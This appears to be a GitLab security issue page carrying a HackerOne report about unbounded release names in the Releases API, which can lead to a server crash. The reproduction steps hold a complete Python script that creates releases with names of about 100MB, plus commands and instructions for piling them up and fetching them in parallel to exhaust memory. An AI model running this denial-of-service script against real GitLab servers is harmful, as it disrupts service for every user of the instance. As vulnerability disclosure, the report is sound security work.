Skip to content

Release names are unbounded, leads to server crash

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3015894 by pwnie on 2025-02-26, assigned to @ottilia_westerlund:

Report | How To Reproduce

Report

Summary

We discovered that GitLab's Releases API does not enforce a limit on the size of the release name. An attacker can create releases with excessively large names (e.g., 100MB each), which when aggregated by the listing API, GraphQL queries, or controllers, can return payloads in the range of 1GB–2GB. This can exhaust server memory and CPU, ultimately leading to a denial of service.

Steps to Reproduce

  1. Prepare the Exploit Script:
    Use the following Python script to create releases with huge names:

    #!/usr/bin/env python3  
    import argparse  
    import json  
    import sys  
    from datetime import datetime  
    import requests  
    import os  
    import base64
    
    def parse_args():  
        parser = argparse.ArgumentParser(  
            description="Create a GitLab release via the API using configurable command-line arguments."  
        )  
        parser.add_argument("--host", required=True, help="GitLab host URL (e.g., https://gitlab.com)")  
        parser.add_argument("--token", required=True, help="Private token for authentication")  
        parser.add_argument("--project", required=True, help="Project ID or URL-encoded path")  
        parser.add_argument("--tag-name", required=True, help="The Git tag for the release")  
        parser.add_argument("--tag-message", help="Optional tag message for creating an annotated tag")  
        parser.add_argument("--description", help="Release description (Markdown supported)")  
        parser.add_argument("--ref", help="Ref (commit SHA, branch, or tag) to create the release from if tag does not exist")  
        parser.add_argument("--assets", help=("Assets JSON string. Example: '{\"links\": [{\"name\": \"My Asset\", \"url\": \"https://example.com/asset\"}]}'"))  
        parser.add_argument("--milestones", help="Comma-separated list of milestone titles")  
        parser.add_argument("--milestone-ids", help="Comma-separated list of milestone IDs (cannot be combined with milestones)")  
        parser.add_argument("--released-at", help="Release datetime in ISO 8601 format (e.g., 2021-01-01T00:00:00Z)")  
        parser.add_argument("--legacy-catalog-publish", action="store_true", help="If set, the release will be published to the CI catalog")  
        parser.add_argument("--mb-size", type=int, default=10, help="Size in MB for the base64 encoded release name")  
        return parser.parse_args()
    
    def generate_release_name(mb_size):  
        # Calculate number of raw bytes needed so that base64 encoding yields mb_size MB.  
        raw_length = mb_size * 1024 * 1024 * 3 // 4  
        random_bytes = os.urandom(raw_length)  
        b64_data = base64.b64encode(random_bytes).decode('utf-8')  
        # Keep only alphanumeric characters  
        filtered = ''.join(c for c in b64_data if c.isalnum())  
        return filtered
    
    def main():  
        args = parse_args()
    
        url = f"{args.host.rstrip('/')}/api/v4/projects/{args.project}/releases"  
        headers = {  
            "Content-Type": "application/json",  
            "PRIVATE-TOKEN": args.token  
        }  
        data = {"tag_name": args.tag_name}
    
        if args.tag_message:  
            data["tag_message"] = args.tag_message  
        # Generate release name with adjustable size.  
        data["name"] = generate_release_name(args.mb_size)  
        if args.description:  
            data["description"] = args.description  
        if args.ref:  
            data["ref"] = args.ref  
        if args.assets:  
            try:  
                data["assets"] = json.loads(args.assets)  
            except json.JSONDecodeError as e:  
                print("Invalid JSON for assets:", e)  
                sys.exit(1)  
        if args.milestones:  
            data["milestones"] = [m.strip() for m in args.milestones.split(",")]  
        if args.milestone_ids:  
            milestone_ids = []  
            for m in args.milestone_ids.split(","):  
                m = m.strip()  
                try:  
                    milestone_ids.append(int(m))  
                except ValueError:  
                    milestone_ids.append(m)  
            data["milestone_ids"] = milestone_ids  
        if args.released_at:  
            try:  
                datetime.fromisoformat(args.released_at.replace("Z", "+00:00"))  
                data["released_at"] = args.released_at  
            except ValueError:  
                print("Invalid datetime format for released_at. Expected ISO 8601 format.")  
                sys.exit(1)  
        if args.legacy_catalog_publish:  
            data["legacy_catalog_publish"] = True
    
        response = requests.post(url, headers=headers, json=data)  
        if response.ok:  
            print("Release created successfully:")  
            print(json.dumps(response.json(), indent=2))  
        else:  
            print("Failed to create release:")  
            print(f"Status code: {response.status_code}")  
            try:  
                print(json.dumps(response.json(), indent=2))  
            except Exception:  
                print(response.text)
    
    if __name__ == "__main__":  
        main()  
  2. Generate a Large Release Name:
    Create a release with a 100MB name by running:

    ./create_release.py --host https://gitlab.com --token <PRIVATE_TOKEN> --project <PROJECT_ID> --tag-name v1.0.0 --mb-size 100 --description "Release with large name"  
  3. Repeat the Process:
    Create enough releases (each with a 100MB name) so that the cumulative size of release names is between 1GB and 2GB.

  4. Trigger the Vulnerability:
    Fetch the release listings using GitLab’s listing API, GraphQL query, or through the controllers. The aggregated payload containing the massive release names will consume excessive resources. Sending these requests in parallel can overwhelm the server, potentially causing a crash.

Impact

  • Denial of Service (DoS): The unbounded release name field allows an attacker to store enormous amounts of data, which, when queried, can consume excessive server memory and CPU.
  • Service Disruption: Parallel requests on listings with these oversized releases can crash the server, disrupting service for all users.
  • Resource Exhaustion: The attack leverages the API's lack of constraints, leading to potential long-term availability issues and performance degradation.

Components Affected

  • Releases API Endpoint: The API that creates and stores release information.
  • Listing API & Controllers: Endpoints responsible for fetching and rendering release data.
  • GraphQL Query Endpoints: GraphQL interfaces that expose release information without enforcing data size limits.

Usage Examples

  • Creating a Standard Release with a Huge Name (e.g., 100MB):

    ./create_release.py --host https://gitlab.com --token <PRIVATE_TOKEN> --project <PROJECT_ID> --tag-name v1.0.0 --mb-size 100 --description "Release with 100MB name"  
  • Creating Multiple Releases for Aggregated Payload Testing:

    Repeat the above command with different tag names (e.g., v1.0.1, v1.0.2, etc.) until the cumulative size of release names is sufficiently large (totaling 1GB–2GB).

  • Triggering the Listing Endpoint:

    After creating enough releases, invoke the listing API or a GraphQL query endpoint (possibly in parallel) to fetch the release data, which will process the massive payload and potentially crash the server.

Impact

  • Denial of Service (DoS): The unbounded release name field allows an attacker to store enormous amounts of data, which, when queried, can consume excessive server memory and CPU.
  • Service Disruption: Parallel requests on listings with these oversized releases can crash the server, disrupting service for all users.
  • Resource Exhaustion: The attack leverages the API's lack of constraints, leading to potential long-term availability issues and performance degradation.

How To Reproduce

Please add reproducibility information to this section: